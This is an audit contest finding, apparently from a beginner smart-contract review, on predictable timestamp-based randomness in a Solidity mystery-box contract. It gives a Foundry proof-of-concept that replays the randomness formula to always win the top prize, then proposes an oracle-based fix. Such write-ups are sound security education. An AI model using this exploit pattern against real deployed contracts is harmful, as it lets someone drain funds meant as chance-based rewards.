Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: medium
Valid

Randomness logic for the openbox function is predictable

Summary

A user can predict the randomValue used to determine the type of box, so they can always open the highest-paying box, which defeats the whole point of the game. A non-predictable randomness source should be used instead.

Vulnerability Details

POC

```solidity
function testOpenBoxRewardLogic() public {
    // user2 buys a box
    vm.deal(user2, 1 ether);
    vm.prank(user2);
    mysteryBox.buyBox{value: 0.1 ether}();

    uint256 winningGold;
    // Replay the contract's own randomness formula inside the test and advance
    // the clock until a timestamp is found that yields 99, the gold outcome.
    while (winningGold != 99) {
        vm.warp(block.timestamp + 2);
        winningGold = uint256(keccak256(abi.encodePacked(block.timestamp, address(user2)))) % 100;
        console.log(winningGold);
    }

    // Open the box at the chosen timestamp
    vm.prank(user2);
    mysteryBox.openBox();

    // getRewards reads msg.sender, so the call must also be made as user2
    vm.prank(user2);
    MysteryBox.Reward[] memory rewards = mysteryBox.getRewards();
    console.log(rewards.length);
    // The reward is the 1 ether gold prize
    assertEq(rewards[0].value, 1 ether);
}
```

Impact

A user can always win the highest-paying box, which defeats the basic premise of the mystery box contract.

Tools Used

=> foundry

=> manual review

Recommendations

Change the method used to derive randomValue: block.timestamp and the caller's address are known before the transaction is mined, so an unpredictable randomness source should be used instead.
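A hardened shape for openBox, added here as an illustration and not the project's own code: the box is consumed at request time and the outcome is fixed later by a value delivered by an external randomness oracle. The coordinator interface below is a minimal stand-in modelled on Chainlink VRF v2 (an assumption, as are the reward tiers below the 1 ether top prize).

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
// Minimal stand-in modelled on Chainlink VRF v2's coordinator interface (assumption).
interface IVRFCoordinatorV2 {
    function requestRandomWords(bytes32 keyHash, uint64 subId, uint16 minConfirmations,
        uint32 callbackGasLimit, uint32 numWords) external returns (uint256 requestId);
}

contract MysteryBoxVrf {
    struct Reward { string name; uint256 value; }
    IVRFCoordinatorV2 public immutable coordinator;
    bytes32 public immutable keyHash;
    uint64 public immutable subId;
    mapping(address => uint256) public boxesOwned;
    mapping(uint256 => address) public requestOwner; // requestId => player awaiting an outcome
    mapping(address => Reward[]) internal rewardsOwned;

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subId) {
        coordinator = IVRFCoordinatorV2(_coordinator);
        keyHash = _keyHash;
        subId = _subId;
    }
    function buyBox() external payable {
        require(msg.value == 0.1 ether, "Box costs 0.1 ether");
        boxesOwned[msg.sender] += 1;
    }

    // Step 1: consume the box now; the outcome is fixed later by a value nobody knows yet.
    function openBox() external returns (uint256 requestId) {
        require(boxesOwned[msg.sender] > 0, "No boxes to open");
        boxesOwned[msg.sender] -= 1; // burn before requesting: one box, one request
        requestId = coordinator.requestRandomWords(keyHash, subId, 3, 200_000, 1);
        requestOwner[requestId] = msg.sender;
    }
    // Step 2: only the coordinator may deliver the word, and each request settles once.
    function fulfillRandomWords(uint256 requestId, uint256[] calldata randomWords) external {
        require(msg.sender == address(coordinator), "Only coordinator");
        address player = requestOwner[requestId];
        require(player != address(0), "Unknown request");
        delete requestOwner[requestId];
        uint256 randomValue = randomWords[0] % 100; // same 0..99 bucketing as the original
        if (randomValue < 75) rewardsOwned[player].push(Reward("Coal", 0)); // lower tiers assumed
        else if (randomValue < 95) rewardsOwned[player].push(Reward("Bronze", 0.1 ether));
        else if (randomValue < 99) rewardsOwned[player].push(Reward("Silver", 0.5 ether));
        else rewardsOwned[player].push(Reward("Gold", 1 ether)); // the 1 ether top prize
    }
    function getRewards() external view returns (Reward[] memory) { return rewardsOwned[msg.sender]; }
}
```

Because the random word does not exist when openBox is called, a test like the POC above has nothing to replay, and the reward can no longer be chosen by timing the transaction.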

Updates

Appeal created

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Randomness
